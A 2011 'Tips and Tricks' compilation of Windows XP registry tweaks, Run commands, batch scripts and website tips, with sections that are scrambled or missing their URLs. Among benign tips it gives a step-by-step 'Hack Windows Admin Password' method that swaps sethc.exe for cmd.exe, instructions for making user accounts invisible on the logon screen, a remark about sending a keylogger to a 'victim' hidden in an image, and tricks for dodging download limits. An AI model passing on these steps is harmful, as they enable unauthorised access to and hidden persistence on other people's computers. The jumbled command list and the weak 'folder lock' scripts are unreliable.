Tips and Tricks 2011BANDI KISHORE. S ************************************************************************************* BBBBBBH BB SBB BR IB BBDBBBI BD BB BB BB RRBBBOI BN BR BB IBB BB BB BBBB BR BBI BB IBBI BR BBS IBB BBBD BB RB IB BB BBBBBBBO BB BBI B BR BBBBBBBB BB BB BB BB BB BBBBBBBB OBBBBB IBB IBB EBBBBI HBB BB IBBBBBBH IBO AB ABBB OB IB BB HB IB BB IB IB BBAB IB BBB IB AR IBI BB EBH BB IBI BB IBBBBBBBB IBI BB IBI BB IBI BB BBBBBBBI BBI IBBB BB ABI RB BN RB NB BBI IIBBI IRBBBRI BBBBBBBB BB BR BB BB BB BBRDRBBB NBBBB IBBI IBBO BB OBI BS BK BB IBI HBE IBB IBBBBBI IBBBBBS IBB IIBB IBI BB BBDBBB BE ABR BI BBI BI BBH BBBBBBBE BB BB BBBBBBB BB BB BBBBBBBE ************************************************************************************* ****************************** *** Created n cracked by *** *** Kishore *** *************************** Surprised? So jst keep Smiling... :-) :) :) :-) BANDI KISHORE. S Page 1 Tips and Tricks 2011 BANDI KISHORE. S ----------------------------------------------------------------------------------------------------------------------------------------**************************XP TIPS****************************** 1) If u don’t want others to access some websites. Ex: Suppose you do not want your friends to access the website ‘’, just add the line ‘’ at the end of the fle ‘hosts’ found in ‘C:\Windows\system32\drivers\etc\’. You can open the fle using Notepad. If you ever need to access that website later, just delete the line or add a semicolon to the beginning of the line. Similarly, you can add as many websites as you want to block your computer from accessing. 2) The FixBoot and FixMBR commands can repair the master boot record of the hard drive. 3) Fast system properties: Press alt+click on my computer icon (or) press ctrl+break. 4) Did u know the use of each Special function keys? F1- Help F2- Rename F3- Search F4- Address Bar F5- Refresh F6 or F7- Spelling F8- Safe Mode F10- Menu Bar F11- Resize F12- Save BANDI KISHORE. S Page 2 Tips and Tricks 2011 BANDI KISHORE. S 5) Do you want to create your own icon? >Go to Paint >Open image >Resize it to 32*32 as size & pixels >save as "filename.ico" & use it as icon. 6) Turn Off all system beps: -go 2 start>Run>Regedit -Go 2 HKEY_CURRENT_USER\Control Panel\Sound -Edit the key Beep and give it a value NO or 0. 7) In windows u can’t create a folder with these names: CON => corresponds to the console, PRN, AUX, NUL, LPT1 => corresponds to printer, LPT2, LPT3,..., LPT9 COM1, COM2, COM3,..., COM9 U cannot create since these are reserved by window based operating system. 8) Secret WINDOWS APPs, type in RUN: "sigverif" - Used for File signature Verification "dxdiag" - DirectX trouble Shooter "secpol.msc" - Local Security Settings "verifier" - Driver verifier manager "compmgmt.msc" - computer management "devmgmt.msc" - device management "diskmgmt.msc" - disk management "gpedit.msc" - group policy editor, contains secret settings BANDI KISHORE. S Page 3 System File Checker Utility (Scan On Every Boot) "sfc /revert" .Windows Media Player "msmsgs" .System Properties "tcptest" .TCP Tester "telnet" .Windows Version (to show which version of windows) BANDI KISHORE.Windows Backup Utility (if installed) "explorer" .cpl" .cpl" .Windows Address Book Import Utility "ntbackup" .System File Checker Utility (Return to Default Setting) "sfc /purgecache" .Tips and Tricks 2011 BANDI KISHORE.Windows Update Launches "winver" .Telnet Client "tweakui" .Windows Magnifier "wmimgmt.Microsoft configuration used for startup.disk defragmenter "msconfig" .Add/Remove Pgms "Control userpasswords2" .System Configuration Editor "sfc /scannow" .Task Manager "sysdm.Tweak UI (if installed) "nusrmgr.msc" .Windows Address Book "wabmig" .Add new hardware "wmimgmt. S Page 4 .Windows Explorer "firewall.Windows System Security Tool "wupdmgr" . boot loader manager.Change password of any account.System Information "taskmgr" .Windows management instrumentation "cliconfg" .sc" .Windows Messenger "wiaacmgr" . "control" .msc" .System File Checker Utility (Purge File Cache) "sfc/cachesize=x" .cpl" .cpl" .System File Checker Utility (Scan Once At Next Boot) "sfc /scanboot" .SQL Client Configuration "sysedit" .Windows Firewall "magnify" . "appwiz.Windows Picture Import Wizard (need camera connected) "syskey" .System File Checker Utility (Set Cache Size to size x) "msinfo32" . S "dfrg.User Account Management "utilman" .Control panel "hdwwiz.cpl" .Windows Management Infrastructure "wmplayer" .System File Checker Utility (Scan Immediately) "sfc /scanonce" . services.Utility Manager "wab" . add or delete account. Spider Solitare Card Game "mrt" .cpl" .Services "fsmgmt.Microsoft Frontpage (if installed) "moviemk" .Scheduled Tasks "wscui.Phone Dialer "pinball" .cpl" .Shuts Down OR shutdown Windows "mmsys.Remote Access Phonebook "mstsc" .Regional Settings "regedit" .Pinball Game "powercfg.Microsoft Chat "excel" .Microsoft Access (if installed) "winchat" .msc" .msc" .Sounds and Audio "spider" .Resultant Set of Policy (XP Prof) "sticpl.msc" .Quicktime (If Installed) "realplay" .Registry Editor "regedit32" .cpl" .Removable Storage Operator Requests "rsop.Microsoft Movie Maker "mspaint" .Registry Editor "rasphone" .cpl" .Wordpad "password.Microsoft Excel (if installed) "frontpg" .cpl" .Shared Folders "shutdown" .Printers Folder "eudcedit" .cpl" .Real Player (if installed) "intl.Private Character Editor "QuickTime.Scanners and Cameras "control schedtasks" .Remote Desktop "ntmsmgr.Power Configuration "control printers" . S Page 5 .Microsoft Paint BANDI KISHORE.msc" .cpl" .msc" .Phone and Modem Options "dialer" . S "tourstart" .Printers and Faxes "printers" .cpl" .Removable Storage "ntmsoprq.Malicious Software Removal Tool "access.Performance Monitor "telephon.msc" .Security Center "services.cpl" .Tips and Tricks 2011 BANDI KISHORE.Windows XP Tour Wizard "write" .Password Properties "perfmon. cpl" .Object Packager "odbccp32.cpl" .Mouse Properties "main.Nero (if installed) "conf" .Accessibility Wizard "Wizardhdwwiz.Network Setup Wizard "notepad" .Accessibility Controls "accwiz" .Java Control Panel (If Installed) "secpol.Minesweeper Game "control mouse" .cpl" .ODBC Data Source Administrator "osk" ..IP Configuration (Display DHCP Class ID) "ipconfig /setclassid" .IP Configuration (Display DNS Cache Contents) "ipconfig /flushdns" ..Opens AC3 Filter (If Installed) "msimn" ..Local Users and Groups "logoff.msc" .cpl" .Microsoft Word (if installed) "mobsync" .Add Hardware BANDI KISHORE. S "powerpnt" .Outlook Express "pbrush" .Microsoft Syncronization Tool "winmine" .IP Configuration (Delete DNS Cache Contents) "ipconfig /release" .cpl" .cpl" .cpl" .IP Configuration(RefreshesDHCP&Re-RegistersDNS) "ipconfig/showclassid" .Microsoft Powerpoint (if installed) "winword" .Tips and Tricks 2011 BANDI KISHORE.On Screen Keyboard "ac3filter.IP Configuration (Renew All Connections) "ipconfig/registerdns" .Java Control Panel (If Installed) "javaws" .Mouse Properties "nero" .IP Configuration (Display Connection Configuration) "ipconfig /displaydns" .." .Keyboard Properties "ipconfig /all" .Paint "control keyboard" .msc" .IP Configuration (Modifies DHCP Class ID) "jpicpl32. S Page 6 .Notepad "nvtuicpl.Logs You Out Of Windows "access.IP Configuration (Release All Connections) "ipconfig /renew" .Nview Desktop Manager (If Installed) "packager" .cpl" .Network Connections "netsetup.Netmeeting "control netconnections" .Network Connections "ncpa.Local Security Settings "lusrmgr.cpl" . Computer Management "control" .Certificate Manager "charmap" .Disk Cleanup Utility "dfrg.Adobe Distiller (if installed) "imageready" .DDE Shares "devmgmt.Character Map "chkdsk" .File Signature Verification Tool "findfast.Date and Time Properties "ddeshare" .Adobe ImageReady (if installed) "photoshop" .Bluetooth Transfer Wizard "calc" .Command Prompt "dcomcnfg" .msc" .Disk Management "diskpart" .Driver Verifier Utility "eventvwr.Adobe Designer (if installed) "acrodist" .Automatic Updates "fsquirt" .cpl" .Event Viewer "migwiz" . S "appwiz.cpl" .cpl" .Disk Partition Manager "control desktop" .msc" .msc" .Direct X Troubleshooter "cleanmgr" .Findfast BANDI KISHORE. System Troubleshooting Utility "verifier" .Calculator "certmgr.Component Services "compmgmt.cpl" .msc" .Display Properties (w/Appearance Tab Preselected) "drwtsn32" .cpl" .Administrative Tools control "acrobat" .Add/Remove Programs "admintools" .Tips and Tricks 2011 BANDI KISHORE.Display Properties "desk.Disk Defragment "diskmgmt.Display Properties "control color" .msc" .Check Disk Utility "clipbrd" .Files and Settings Transfer Tool "sigverif" .Control Panel "timedate.Adobe Acrobat (if installed) "acrodist" . S Page 7 .Device Manager "directx.Adobe Photoshop (if installed) "wuaucpl.msc" .cpl" .This program Is for repairing problems in Windows.Clipboard Viewer "cmd" .Direct X Control Panel (If Installed) "dxdiag" . Group Policy Editor (XP Prof) "mshearts" .Tips and Tricks 2011 BANDI KISHORE.Firefox (if installed) "control folders" .Game Controllers "gpedit.Internet Connection Wizard "iexplore" .System Monitor "progman" . S Page 8 .msc" .Internet Explorer "inetwiz" .Internet Properties "packager" .Iexpress Wizard "ciadv.Remote Access phone book "sndvol32" . Go 2 any folder ctrl+w .Folders Properties "control fonts" .HyperTerminal "iexpress" .quit ctrl+e (or) ctrl+f .Fonts Folder "freecell" .Fonts "fonts" .Object Packager "perfmon" .msc" .Program Manager "rasphone" .history ctrl+b .Help and Support "hypertrm" .Indexing Service "icwconn1" . S "firefox" . press BANDI KISHORE.cpl" .Internet Setup Wizard "inetcpl.Volume Contro 9) All new windows shortcuts.Free Cell Card Game "joy.Organize favorites 10) fed up of confirmation dialog on delete? U can supress confirmation dialog > right click on recycle bin -> properties > uncheck "display confirmation" 11) Trick to operate ur PC without mouse (generate a VIRTUAL MOUSE).Hearts Card Game "helpctr" .search ctrl+h .cpl" . Go 2 Run .exe 3. Eudcedit.exe 5.exe user32. 12) Add ur folder into send option. Charmap. S Shift + Alt + Numlock Use the numpad keys 2 operate.exe 4. -Copy shortcut of ur desired folder -paste it into -C:/Documents and settings/<User_name>/sendto -Paste it into dis folder 13) Open Programs Automatic on Boot Up >Right click START button click open >Double-click on Programs & then on Startup > Drag ur fav in that window 14) WINDOWS HIDDEN TOOLS Type all Keywords in RUN: 1. Syskey.exe 2. Gpedit. Sndvol32.Type: Control .Tips and Tricks 2011 BANDI KISHORE.Press Enter 16) Lock ur Desktop >Press the Windows key & L key (WinKey+L) or >create a new shortcut rundll32. S Page 9 .exe 15) Easy Way 2 Open Control Panel .dll.LockWorkStation BANDI KISHORE. Tips and Tricks 2011 BANDI KISHORE. Just Resume it >Create a Shortcut & Type This rundll32.{ED7BA470-8E54-465E-825C-99712043E01C} 22) Make Invisible Account (XP) 1. if Ur PC Gone Off. 18) Private Character Editor This program is for designing icons and Characters(Alphapet) start -> run -> EUDCEDIT 19) iExpress This Program is for conerting your files to EXCUTABLE files start -> run -> iexpress 20) Windows Media Player 5. Go to Control Panel and create a NEW ACCOUNT say BANDI_KISHORE(or u may use d existing one) inside User Accounts 2. Go to START->RUN–type in regedit BANDI KISHORE. Windows enthusiasts are excited over the discovery of a hidden "GodMode" feature that lets users access all of the operating system's control panels from within a single folder. S Page 10 .exe PowrProf. S 17) Want to Resume Ur Work in PC." one need only create a new folder and then rename the folder to the following: GodMode. To enter "GodMode.1 Opens the old media player start -> run -> mplay32 21) Although its name suggests perhaps even grander capabilities.dll Set Suspend State!". S 3. just change the value to 1.{21EC2020-3AEA-1069-A2DD-08002B30309D}" echo Folder locked goto End BANDI KISHORE. If you want to hide an existing one. If you want it to show. goto CONFIRM :LOCK ren BandiKishoreLock "Control Panel.bat" cls @ECHO OFF title BANDI KISHORE Folder Lock if EXIST "Control Panel. S Page 11 . Copy and paste this under given code in your notepad and save it as "BandiKishoreLock. Now log off and see that your account is not in the logon screen. To logon to your hidden account press CTRL+ALT+Delete twice.Tips and Tricks 2011 BANDI KISHORE. Here type in your NEW_ACCOUNT and that’s it 23) Lock Any Folder In Windows OS Using Only Notepad Open notepad from your windows start button. 7. HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\WinLogon\SpecialAccounts \UserList 4.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK if NOT EXIST BandiKishoreLock goto MDLOCKER :CONFIRM echo Are you sure u want to Lock the folder(Y/N) set/p "cho=>" if %cho%==Y goto LOCK if %cho%==y goto LOCK if %cho%==n goto END if %cho%==N goto END echo Invalid choice. 6.{21EC2020-3AEA-1069-A2DD-08002B30309D}" attrib +h +s "Control Panel. Here create a new DWORD by right clicking and name it as you did your new account (BANDI_KISHORE). 5. The value of the DWORD has to be zero if you want it to be hidden. just type in its name. {21EC2020-3AEA-1069-A2DD-08002B30309D}" ren "Control Panel.Tips and Tricks 2011 BANDI KISHORE.jpg and hello. this will ask "Are you sure you want to lock the folder. S Page 12 . This is generally performed by the Terrorists to Hide the Secret messages behind the Images and conveying the message via sending the Image via Internet. just Type y and press Enter. Now the folder and your file gets locked. S :UNLOCK echo Enter password to Unlock folder set/p "pass=>" if NOT %pass%==BANDIKISHORE goto FAIL attrib -h -s "Control Panel.txt. BANDI KISHORE. Now keep the Batch File named "BandiKishoreLock. To Unlock the Folder and your file. just double click the Batch file "FolderLock" again and it will say "Enter password to unlock folder".bat" at a different place like your USB Pen Drive so that only you can unlock and access the folder you have locked.the default password is set as "BANDIKISHORE". So how it works let's take a look:Let us say we have file named image. 24) Steganography (Technique To Information Hiding) Steganography is the technique to place text or any other content behind the images.{21EC2020-3AEA-1069-A2DD-08002B30309D}" BandiKishoreLock echo Folder Unlocked successfully goto End :FAIL echo Invalid password goto end :MDLOCKER md BandiKishoreLock echo Bandi Kishore Lock created successfully goto End :End Now Double Click that new Batch file named "BandiKishoreLock" and it will make a new folder named BandiKishoreLock at the same location : Now put the Data Inside the folder "BandiKishoreLock" and again Double Click the Batch file to Lock it. so just type "y". Text will be written in last line.jpg. 25) Lock The Folder (By makin it a recycle bin) Suppose you have to lock the folder BANDIKISHORE which has the path e:\BANDIKISHORE.{645FF040-5081-101B-9F08-00AA002F954E} Now save it as lock.jpg+hello. So in this way you can hide any contents like rar. BANDI KISHORE. S Page 13 . Open notepad and type ren BANDIKISHORE BANDIKISHORE.bat Remember if you have saved this batch file in same drive in which folder BANDIKISHORE has placed. recycle bin will get opened. To view the hidden text file > Right click on Final.Tips and Tricks 2011 BANDI KISHORE. so no one can access it. go to the end of file. Let us suppose if you have your BANDIKISHORE folder in e: but you save the file in desktop or in any other drive then you have to type as ren e:\BANDIKISHORE BANDIKISHORE. then above method is right but if you save the file in any other drive or in desktop then you have to specify the path. Whenever someone would try to access this folder. You can also send keylogger to your victim by using this way.jpg is the image behind which text file has hidden. open it with notepad.exe files. S So for hiding the text behind the image > Go to run >cmd >Type copy /b image.{645FF040-5081-101B-9F08-00AA002F954E} Now open this batch file ur folder will change to Recycle Bin with the name BANDIKISHORE.txt Final.jpg Final. I have already explained one more method of folder locking using Batch. otherwise Windows will not boot next time.Tips and Tricks 2011 BANDI KISHORE. S Page 14 . S Actually {645FF040-5081-101B-9F08-00AA002F954E} is the registry value for Recycle bin. BANDI KISHORE. you must have the knowledge how it works.bat Recycle Bin will change back to original folder. In the similar way you can change it to control panel by replacing {645FF040-5081-101B-9F08-00AA002F954E} with {21EC2020-3AEA-1069-A2DD-08002B30309D} Now for unlocking this folder create one more batch file with same method and type ren BANDIKISHORE. so here it is: > Open cmd prompt > Type cacls "path_of_folder" /E /P everyone:n To regain access type: > cacls "path_of_folder" /E /P everyone:f But do not lock C:\ Drive By this method .{645FF040-5081-101B-9F08-00AA002F954E} BANDIKISHORE and save it as unlock. Try it & Enjoy. 26) Lock The Folder With CMD Want to lock a folder without using any software and any password. This batch file will rename the BANDIKISHORE folder with ren command to Recycle Bin. However it's just a two line method but for learning purpose. then simple uncheck the Notify me when this connection has limited or no connectivity. 28) Save Images From MS Word (. so here's a way simply to save picture from BANDI KISHORE. Then go to Local Area Connection Properties and uncheck Notify me when this connection has limited or no connectivity. you may encounter a Limited Or No Connectivity error message. "This connection has limited or no connectivity. " . This message can result from any of several different technical glitches or configuration problem. you may receive the following error message in the System Tray. Just copy this code and paste it in notepad. However if your broadband connection is working properly but still it displays the error then no need to worry about it.doc) When you open any document in MS word. You might not be able to access the Internet or some network resources. try to click on picture for saving then it does not provide option for saving it. S 27) Fix Limited Or No Connectivity After installing Windows XP Service Pack 2. Then save it as fix. S Page 15 .Tips and Tricks 2011 BANDI KISHORE. When attempting to set up or make network connections on a Windows computer.bat echo ipconfig/flushdns ipconfig/flushdns echo ipconfig/release ipconfig/release echo ipconfig/renew ipconfig/renew exit It will fix the error automatically. 3. Save picture in the way as you do from any html file either by drag and drop or right click then save image as. Just follow these steps: Go to start > run > cmd > Type "net user guest BANDIKISHORE" without quotes where BANDIKISHORE is your password which you will apply to guest. Go to user accounts. Open it with browser. Save . Follow these simple steps: 1.Tips and Tricks 2011 BANDI KISHORE. But for this you must be Log In with using administration account.doc documents as web page means as .htm 2. but you can easily apply it using cmd .doc file. you will see password apply to your guest account. S any . 29) Apply Password To Your Guest Account Applying a password to your guest account looks somewhat annoying. 30) Command Prompt As Calculator So you can use your command prompt as calculator too: C:\>set /a 1+1 C:\>set /a 1-1 C:\>set /a 4*3 C:\>set /a 4%3 C:\>set /a 4/3 31) From When Your Computer Is Running So let's know from when your computer is running? BANDI KISHORE. S Page 16 . Here's one more other way by using this command systeminfo. S Page 17 . S Go to start > run > cmd and type > net statistics workstation It will show statistics since date & time. > Check /NOGUIBOOT Apply then OK. Restart your computer and you will see your user BANDI KISHORE. 32) Disable XP Start Screen Go to start > run > Type msconfig > Go to BOOT.Tips and Tricks 2011 BANDI KISHORE.INI Tab. Go to start > run > Type regedit Go to the path HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon\SpecialAccounts \UserList Create a new DWORD value in right panel with the name of your user account and give it value 0. Restart your system. 33) Create Hidden Account In XP Login with administration account. Tips and Tricks 2011 BANDI KISHORE. faster XP. change the value to 0 or delete it. BANDI KISHORE. Open notepad . S account disable from welcome screen and user accounts. change the value of DWORD from 0 to 1.bat. Type regedit and save it as log. > Log off or restart your computer. Go to the same path. So how to find it. open Regedit and go to: HKEY_CLASSES_ROOT/CLSID/{645FF040-5081-101B-9F08-00AA002F954E} and change the name "Recycle Bin" to whatever you want (don't type any quotes). For enable. 34) Disable Log Off From Start Menu Follow these steps: Go to start > run > regedit > Go to the path HKey_Current_User\Software\Microsoft \Windows\Current Version\Policies\Explorer > Add a new DWORD value on right side by right click on right panel. 35) How to Rename the Recycle Bin To change the name of the Recycle Bin desktop icon. S Page 18 . 36) For a Safer. name it StartMenuLogoff > Give it a value 1. use the "Services" Admin Tool (Control Panel > Administrative Tools > Services). faster XP Close Unwanted Services To disable unneeded startup services for a safer. with no ill effect. To demonstrate the problem with this on stand alone machines start up a big download from a server with an FTP client. you can disable the following items. even when this item is disabled. Alerter Clipbook Computer Browser Fast User Switching Human Interface Access Devices Indexing Service (Slows the hard drive down) Messenger Net Logon (unnecessary unless networked on a Domain) Netmeeting Remote Desktop Sharing (disabled for extra security) Remote Desktop Help Session Manager (disabled for extra security) Remote Procedure Call Locator Remote Registry (disabled for extra security) Routing & Remote Access (disabled for extra security) Server SSDP Discovery Service (this is for the utterly pointless "Universal P'n'P". S Page 19 . S If you are a single user of a non-networked machine. Even with QoS disabled. So why not use it to your advantage.Tips and Tricks 2011 BANDI KISHORE. & leaves TCP Port 5000 wide open) TCP/IP NetBIOS Helper Telnet (disabled for extra security) Universal Plug and Play Device Host Upload Manager Windows Time Wireless Zero Configuration (for wireless networks) Workstation 37) Internet Broadband This is more of a "counter what XP does" thing. XP seems to want to reserve 20% of the bandwidth for its self. Try to find a server that BANDI KISHORE. In other words. type gpedit. Let it run for a couple of minutes to get stable. -> right click "menu show delay". do not log on with any account that just has administrator privileges. on setting tab check the "enabled" item 9.make sure your logged on as actually "Administrator".run . start . change value from 20000 to 3000. -> right click on "waytokillapptimeout" modify. S Page 20 . Using this "tweak" both clients will have a fair share of the bandwidth and will not fight over the bandwidth.then click OK. where it says "Bandwidth limit %" change it to read 0 reboot if you want to but not necessary on some systems. expand the "network branch" 6. 38) To Speed Up Ur Computer Click START-> Run-> Type "regedit"-> HKEY_CURRENT_USER -> control panel -> desktop -> hung application timeout. this is for broad band connections. In this case you want a slow to medium speed server to demonstrate this. You will notice that the available bandwidth is now being fought over and one of the clients download will be very slow or both will slow down when they should both be using the available bandwidth. Highlight the "QoS Packet Scheduler" in left window 7. 2. Then start up another download from the same server with another instance of your FTP client. expand the "administrative templates" branch 5. BANDI KISHORE.Tips and Tricks 2011 BANDI KISHORE. S doesn't max out your bandwidth. make value to 1000. I didn’t try it on dial up but might work for dial up. in right window double click the "limit reservable bandwidth" setting 8. expand the "local computer policy" branch 4. 1. right click'modify'. make it 80.msc 3. Double-click the FilterFilesWithUnknownExtensions icon in the right pane. click More Advanced Options. select All Files and Folders under 'Type of file' in the Search Companion pane.) Check Search system folders. Uncheck Hide protected operating system files (Recommended). 40) Boot Defragment in XP A very important new feature in Microsoft Windows XP is the ability to do a boot defragment. and make sure Search Subfolders is checked. S Page 21 . and make sure that (All Files and Folders) is selected in the resulting drop-down menu. and press Enter. In the 'Advanced settings' list. and then navigate to and select: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ContentIndex. check Type. and finish by clicking OK. A simple edit of the Registry will make Windows search for every file. Check Advanced Options. to ensure that Windows 2000 finds system and hidden files. S 39) Find Every File in computer search When you search for a file in Windows Windows searches only for file types it recognizes. select Show hidden files and folders. and Search subfolders (as desired). In Windows 2000.Tips and Tricks 2011 BANDI KISHORE. Finally. click Yes to acknowledge the warning. To ensure that Windows XP searches for every possible file. Search hidden files and folders. click Search Options. Open the Registry Editor as described above. (If you don't see this option. choose Tools. Folder Options and click the View tab. regardless of its extension. This basically BANDI KISHORE. change the 0 in the 'Value data' box to 1. Files that aren't listed in the 'Registered file types' list are ignored. Start Regedit. > type "nusrmgt. 2. and type: > GPEDIT. Right on it and select Modify. To change the interval that Windows updates the time using the internet time servers via regedit. Navigate to HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Dfrg\BootOptimizeFunction 3. Select Enable from the list on the right.e. 41) Changing The Internet Time Update Synchronisation for broadband connection or any FASTER INTERNET ONLY.cpl" into the add box BANDI KISHORE. i. 5. 4. Change decimal value from 604800 to a different value in seconds.MSC > User Config > Admin Templates > Control Panel > doubleclick "Hide specified Control Panel applets" > 'enabled'> then click 'Show" > click Add button. 42) Hide 'User Accounts' from users > Start/Run.Tips and Tricks 2011 BANDI KISHORE. 1.: 172800 (2 Days) or 86400 (1 Day) and so on. Change the value to Y to enable and N to disable. By default this option is enabled but some upgrade users have reported that it isn't on their setup. navigate to: 1. S means that all boot files are placed next to each other on the disk drive to allow for faster booting. HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services \W32Time\TimeProviders\NtpClient 2. 6. Select "SpecialPollInterval" 3. Reboot your computer. S Page 22 . Paste shortcut of any folder or file. S 43) Operate Computer Without Mouse Follow these steps: 1. Follow these simple steps: 1) Go to C:/windows/system32 2) Copy cmd. Now you can operate your cursor position using number keys(use the NUMPAD). 3. S Page 23 . 44) Put Folders. MouseKeys window will appear. * Change Target folder location. So firstly you would have to apply the permission Show hidden files and folders. 45) Change My Documents Location In XP Follow these steps: * Go to property of My documents. 3) Rename cmd.exe and paste it on desktop. So I'm posting here.Tips and Tricks 2011 BANDI KISHORE. Click OK or Settings for further configuration.exe BANDI KISHORE.but still many will be unaware from this way. 46) Hack Windows Admin Password However this is very known method of hacking windows admin password.exe to sethc. Press Shift+Alt + Num Lock 2. Files To "Send To" Go to the path in explorer bar: C:\Documents and Settings\user\SendTo Remember SendTo folder is hidden by default. press Shift key 5 times. 48) Add Your Own Info & Photo In My Computer Properties Follow these steps: > Open Notepad & paste following: [General] Manufacturer=”Company Name” BANDI KISHORE. S Page 24 . type > subst k: /d Basically virtual drive k assign a path to the folder BANDIKISHORE. then click yes.exe to system32 folder. For removing. Now enter password in administrator account. windows will ask for overwriting the file. Now Log Off and at the login screen. You will get cmd prompt there. S 4) Copy the new sethc.Tips and Tricks 2011 BANDI KISHORE. 47) Create Your Virtual Drive Make any folder in C drive say BANDIKISHORE > Go to start > run > Type cmd > subst k: c:\BANDIKISHORE Check your my computer. Now press Shift key 5 times you will get cmd prompt. Now type “net user administrator password” without quotes where “password”can be any password of your desire. new drive should be shown. That's all. To do this. Example: powercfg -energy -output C:\Energy_Report. right-click it and choose "Run as administrator. follow its recommendations for ways to improve power BANDI KISHORE. To use it: > Run a command prompt as an administrator. and when the cmd icon appears.Tips and Tricks 2011 BANDI KISHORE. It will then analyze it and create a report in HTML format in the folder you specified." > At the command line. S Model=Intel® Core™2 Duo [Support Information] Line1= Phone number Line2= Email or website Now Save it as "oeminfo. Windows 7 will examine the behavior of your laptop.ini" (without quotes) in C:\Windows\System32 Create a bmp file of your photo and save it in C:\Windows\System32 as oemlogo. S Page 25 . Now check My Computer properties. Double-click the file. type cmd in the search box. 49) Get a Power Efficiency Report Have a laptop and want to get more battery life out of it? Windows 7 includes a hidden built-in tool that will examine your laptop's energy use and make recommendations on how to improve it.html It lets the file to be created in C: drive > For about a minute. type in the following: powercfg -energy -output \BANDIKISHORE\Energy_Report.html where \BANDIKISHORE represents the folder where you want the report to be placed. and you'll get a report.bmp (without quotes). Tips and Tricks 2011 BANDI KISHORE. S performance. 50) UNINSTALL THE PROGRAMS WITHOUT USING "add and remove programs" just follow the procedure... > open run command . > type "regedit" without quotes. > go to HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall > click on any one of them and check "display name". display name tells the installed program . > delete the folder of the program which you want to uninstall . 51) Solve Hidden Files & Folders Not Showing Follow these steps: > Go to start > run > cmd > Type regsvr32 /i browseui.dll Wait for confirmation window. > Now Type regsvr32 /i shell32.dll Wait for confirmation window. 52) Lock ur Desktop Press the Windows key & L key (WinKey+L) or > create a new shortcut rundll32.exe user32.dll,Lock Work Station BANDI KISHORE. S Page 26 Tips and Tricks 2011 BANDI KISHORE. S 53) Problem in formating pen drive > rt click on computer > manage > disk mgt > rt click on pen drive > remove letter > remove(Plug out&plug) > Format 54) Increase Ur RAM by using PEN DRIVE 1.Goto system & increase virtual mem. 2.Use memory optimizers. 3.Use pen drive as RAM. 55) Make ur own font in xp: Private character editor used for editing fonts,etc. > start > run > type "eudcedit" 56) Want to clear BIOS Password Key > Open CPU > move Jumper to 2-3 pstn from 1-2 > start PC > go to BIOS > clear it > turn off > move Jumper to 1-2 & done 57) Virtual Mouse: > Press ALT+SHIFT+NUMLOCK. > Now use 2,4,6,8 keys on NUMPAD as arrow keys. BANDI KISHORE. S Page 27 Tips and Tricks 2011 BANDI KISHORE. S 58) How to lock the computer. Go to > Run enter > syskey > then password save it in floppy disk (only ur pasword can unlock) > dis floppy can b usd as ur password recovry or 2 unlock ur pc. 59) Hidden service during Windows XP installation. > Press Shift+F10 when "Installing devices" appears, then do DOS programs whatever u want. 60) Convert Ur Text into Voice (speech) in PC: GO 2 > RUN > type "control speechWrite" > Any Text it'll be converted to Voice. 61) Lock ur CD-ROM: Go to > run > type regedit > find(ctrl+F) > then type 'allocatecdrom' > change the value 1 to 0 > to normal then type 0 to 1 62) Want to record sound in computer without any software? > Go to Run > Type Sndrec32 63) disable writing to USB: [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\StorageDevicePolicies] BANDI KISHORE. S Page 28 S "WriteProtect"=dword:00000001 64) BANDI KISHORE.Tips and Tricks 2011 BANDI KISHORE. S Page 29 . 2) Browsin usin GPRS? wana speed up ur browsin? Clear the CACHE n u can gain faster browsin speeds on low end mobiles 3) BANDI KISHORE.2 Computers connected <=*=> U can connect ur old computer 2 ur newly purchased comp to transfer data using "ETHERNET PORTS" (or u can use d below mentioned solution) Hubs and switches. S ----------------------------------------------------------------------------------------------------------------------------------------***************COMPUTER HARDWARE/NETWORK TIPS **************** 1) Ethernet . then all will operate at the speed of 10 Mbps. If anyone is 10 Mbps.Tips and Tricks 2011 BANDI KISHORE. huns.Hubs and switches rated 10/100 can have a speed of 100 Mbps. switches and cables are 100 Mbps compatible. provided all network cards. Systems connected to each other with crosscables should reach 100 Mbps. S Page 30 . Go 2 -desicomment.mymagazinepicture. 6) a) Unlimited download in RAPIDSHARE: -Go to page u wan to download BANDI -orkut123. jst sms PREF 99 07:00am 11:00pm This will make u extend the msgs received to 99 and b/w the specified timings. S Page 31 .com' <=*=> is a website tat lets you know bot a particular file EXTENSION. 5) Google Offers wide variety of SMS CHANNELS under "GOOGLE SMS CHANNELS" using the number "9870807070" bt it provides only limited msgs per day so to change the settings.browsertools. 2) ‘http://www.. S ----------------------------------------------------------------------------------------------------------------------------------------**************************WEB SITES****************************** 1) '' provides u to create a picture of urs in INDIA Today magazine or in any of the popular magazines. 4) Funny Orkut Scraps to ur frnds.Tips and Tricks 2011 BANDI KISHORE. 3) '’ is a place whr u get a freeware 2 download any flash videos 4m any Jst copy & paste HTML code & enjoy Scraping. S Page 32 .Graphics.Go 2 http://lp91. put javascript:alert(c=0) -click ok in pop-up -m. S -select FREE button in address n register 7) Call FREE to any place in the in ur 11) Virtual Graphic Card for new PC games: or yahoo.rar 12) Facing error in any web page like: 'Oops this link seems to be broken' solution BANDI -m. 9) Do you want email instead of gmail. b) Wana get a rapid share premium" Here you can get like Ex: -http://spoofcard.mail.3.v2. . -Go 2 8) During Browsing press ctrl+F5 to clear the stored cache and refresh the page.Tips and Tricks 2011 BANDI KISHORE.goodtricks. then Go 2 " 10) Want to be a magician? jst go 2 -www.mig33. com (By GOOGLE) http://is.Tips and Tricks 2011 BANDI To Search specific type ur_query contains:mp3 To search 4 specific type of file BANDI http://notlong. S >delete cookies >clear cache of ur browser 13) Google SEARCH Tips: To search in a specific website Ex:pdf search_query filetype:pdf 14) URL Shortners: http://goo.htm -www. ur_query 15) Do you know about file extension & what file extension are comptable open with software? -Go 2 http://3.192.att.phonenumber. S Page 33 .com 16) BSNL: Online telephone Directory http://bit. adview.cometdocs. Hide ur websites from school or offices -Go 2 go 